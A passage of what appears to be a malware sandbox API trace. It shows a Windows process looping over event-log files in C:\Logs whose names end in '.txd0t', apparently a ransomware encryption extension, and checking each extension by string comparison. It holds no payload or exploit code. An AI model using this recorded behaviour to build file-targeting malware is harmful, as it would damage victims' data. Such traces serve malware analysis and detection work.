psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.925] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.txd0t" [0128.925] PathFindExtensionW (pszPath="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.txd0t") returned=".txd0t" [0128.925] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.925] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af3554f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5af3554f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x599d774c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.txd0t", cAlternateFileName="MICF1D~1.TXD")) returned 1 [0128.925] StrCmpW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.txd0t", psz2=".") returned 1 [0128.925] StrCmpW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.txd0t", psz2="..") returned 1 [0128.925] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.925] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.925] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.txd0t" [0128.925] PathFindExtensionW (pszPath="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.txd0t") returned=".txd0t" [0128.925] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.925] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85798667, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x85798667, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x599d774c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppxPackaging%4Operational.evtx.txd0t", cAlternateFileName="MI73AA~1.TXD")) returned 1 [0128.926] StrCmpW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.926] StrCmpW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.926] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.926] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.926] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppxPackaging%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx.txd0t" [0128.926] PathFindExtensionW (pszPath="Microsoft-Windows-AppxPackaging%4Operational.evtx.txd0t") returned=".txd0t" [0128.926] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.926] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd74d25ab, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd74d25ab, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x599fd8b5, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.txd0t", cAlternateFileName="MI7FF0~1.TXD")) returned 1 [0128.926] StrCmpW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.926] StrCmpW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.926] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.926] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.926] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.txd0t" [0128.926] PathFindExtensionW (pszPath="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.txd0t") returned=".txd0t" [0128.926] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.926] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1f96ca4, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xe1f96ca4, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59a23b0e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Bits-Client%4Operational.evtx.txd0t", cAlternateFileName="MID4A4~1.TXD")) returned 1 [0128.926] StrCmpW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.926] StrCmpW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.926] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.926] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.926] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Bits-Client%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx.txd0t" [0128.926] PathFindExtensionW (pszPath="Microsoft-Windows-Bits-Client%4Operational.evtx.txd0t") returned=".txd0t" [0128.927] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.927] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8783aa15, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8783aa15, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59a23b0e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-CodeIntegrity%4Operational.evtx.txd0t", cAlternateFileName="MIC2D9~1.TXD")) returned 1 [0128.927] StrCmpW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.927] StrCmpW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.927] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.927] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.927] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-CodeIntegrity%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx.txd0t" [0128.927] PathFindExtensionW (pszPath="Microsoft-Windows-CodeIntegrity%4Operational.evtx.txd0t") returned=".txd0t" [0128.927] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.927] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3c71c5, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8c3c71c5, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59c861d3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.txd0t", cAlternateFileName="MICB90~1.TXD")) returned 1 [0128.927] StrCmpW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.927] StrCmpW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.927] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.927] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.927] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.txd0t" [0128.927] PathFindExtensionW (pszPath="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.txd0t") returned=".txd0t" [0128.927] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.927] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc9231, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cc9231, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59c861d3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.txd0t", cAlternateFileName="MI6817~1.TXD")) returned 1 [0128.927] StrCmpW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.txd0t", psz2=".") returned 1 [0128.927] StrCmpW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.txd0t", psz2="..") returned 1 [0128.927] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.927] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.927] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.txd0t" [0128.927] PathFindExtensionW (pszPath="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.txd0t") returned=".txd0t" [0128.927] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.927] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ca2fbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ca2fbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59a49db1, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.txd0t", cAlternateFileName="MI7A4F~1.TXD")) returned 1 [0128.927] StrCmpW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.927] StrCmpW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.927] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.927] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.927] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.txd0t" [0128.927] PathFindExtensionW (pszPath="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.txd0t") returned=".txd0t" [0128.927] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.927] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3ed420, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8c3ed420, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59d6aeec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x101200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.txd0t", cAlternateFileName="MIDD4B~1.TXD")) returned 1 [0128.928] StrCmpW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.txd0t", psz2=".") returned 1 [0128.928] StrCmpW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.txd0t", psz2="..") returned 1 [0128.928] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.928] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.928] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.txd0t" [0128.928] PathFindExtensionW (pszPath="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.txd0t") returned=".txd0t" [0128.928] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.928] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cef47f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cef47f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59d6aeec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-DeviceSetupManager%4Admin.evtx.txd0t", cAlternateFileName="MI8940~1.TXD")) returned 1 [0128.928] StrCmpW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx.txd0t", psz2=".") returned 1 [0128.928] StrCmpW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx.txd0t", psz2="..") returned 1 [0128.928] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.928] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.928] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-DeviceSetupManager%4Admin.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx.txd0t" [0128.928] PathFindExtensionW (pszPath="Microsoft-Windows-DeviceSetupManager%4Admin.evtx.txd0t") returned=".txd0t" [0128.928] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.928] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc9231, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cc9231, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59d44ce5, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-DeviceSetupManager%4Operational.evtx.txd0t", cAlternateFileName="MIA5C0~1.TXD")) returned 1 [0128.928] StrCmpW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.928] StrCmpW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.928] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.928] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.928] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-DeviceSetupManager%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx.txd0t" [0128.928] PathFindExtensionW (pszPath="Microsoft-Windows-DeviceSetupManager%4Operational.evtx.txd0t") returned=".txd0t" [0128.928] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.928] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc967f17e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc967f17e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59e0391d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Dhcp-Client%4Admin.evtx.txd0t", cAlternateFileName="MI5874~1.TXD")) returned 1 [0128.928] StrCmpW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx.txd0t", psz2=".") returned 1 [0128.928] StrCmpW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx.txd0t", psz2="..") returned 1 [0128.928] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.928] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.928] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Dhcp-Client%4Admin.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx.txd0t" [0128.928] PathFindExtensionW (pszPath="Microsoft-Windows-Dhcp-Client%4Admin.evtx.txd0t") returned=".txd0t" [0128.928] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.928] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc96cb64b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc96cb64b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a0198fe, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.txd0t", cAlternateFileName="MI1FD1~1.TXD")) returned 1 [0128.928] StrCmpW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.txd0t", psz2=".") returned 1 [0128.928] StrCmpW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.txd0t", psz2="..") returned 1 [0128.928] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.928] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.929] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.txd0t" [0128.929] PathFindExtensionW (pszPath="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.txd0t") returned=".txd0t" [0128.929] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.929] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca64aa7b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca64aa7b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a065fd9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.txd0t", cAlternateFileName="MIB57C~1.TXD")) returned 1 [0128.929] StrCmpW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.929] StrCmpW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.929] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.929] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.929] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.txd0t" [0128.929] PathFindExtensionW (pszPath="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.txd0t") returned=".txd0t" [0128.929] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.929] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd9ec80, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xfd9ec80, ftLastAccessTime.dwHighDateTime=0x1d1a04f, ftLastWriteTime.dwLowDateTime=0x5a065fd9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.txd0t", cAlternateFileName="MI0ACA~1.TXD")) returned 1 [0128.929] StrCmpW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.929] StrCmpW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.929] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.929] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.929] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.txd0t" [0128.929] PathFindExtensionW (pszPath="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.txd0t") returned=".txd0t" [0128.929] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.929] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9658ef3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9658ef3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a1e35d3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-GroupPolicy%4Operational.evtx.txd0t", cAlternateFileName="MI347A~1.TXD")) returned 1 [0128.929] StrCmpW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.929] StrCmpW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.929] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.929] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.929] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-GroupPolicy%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx.txd0t" [0128.929] PathFindExtensionW (pszPath="Microsoft-Windows-GroupPolicy%4Operational.evtx.txd0t") returned=".txd0t" [0128.929] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 